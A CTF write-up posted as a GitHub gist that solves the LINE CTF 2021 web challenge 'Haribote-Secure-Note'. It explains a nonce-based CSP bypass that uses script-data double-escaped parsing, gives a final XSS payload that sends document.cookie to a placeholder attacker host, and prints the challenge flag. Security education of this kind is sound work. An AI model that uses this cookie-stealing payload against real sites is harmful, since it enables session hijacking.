Skip to content

Instantly share code, notes, and snippets.

@mdsnins

mdsnins/linectf2021_haribote.md

Created March 26, 2022 23:09
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mdsnins/d8028c47212342ecadd9af5ec10f53f9 to your computer and use it in GitHub Desktop.
Save mdsnins/d8028c47212342ecadd9af5ec10f53f9 to your computer and use it in GitHub Desktop.
Download ZIP
[LINE CTF 2021] Haribote-Secure-Note
Raw
linectf2021_haribote.md

Haribote-Secure-Note

LINECTF 2021 - Web
Writeup by Payload as Super HexaGoN

CSP

This page, CSP was applied. Since nonce- directive is given, we should reuse exisitng valid-nonce script tags.

Two Injection Point

First, we can inject 16 bytes of display name in the admin-restricted page.

const sharedUserName = "{{ shared_user_name }}";

Second, we can inject each 64,128 bytes in render datas. However, since the single quote is escaped, we can't reuse this script tag.

Commenting all

Then, we can think the method commenting all things between first and second injection points, but </script> has more priority over JS comment, it breaks the comment at the middle in normal.
But, when we open another script tag in html comment in script context, as <script><!--<script>, internal HTML parser switches its status to script data double escaped state, which can ignore the </script> in the middle.

Final Payload

display name : <!--<script>"}/* title : --> /* content : */ location.href='(attacker)/c='+document.cookie

LINECTF{0n1y_u51ng_m0d3rn_d3fen5e_m3ch4n15m5_i5_n0t_3n0ugh_t0_0bt41n_c0mp13te_s3cur17y}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment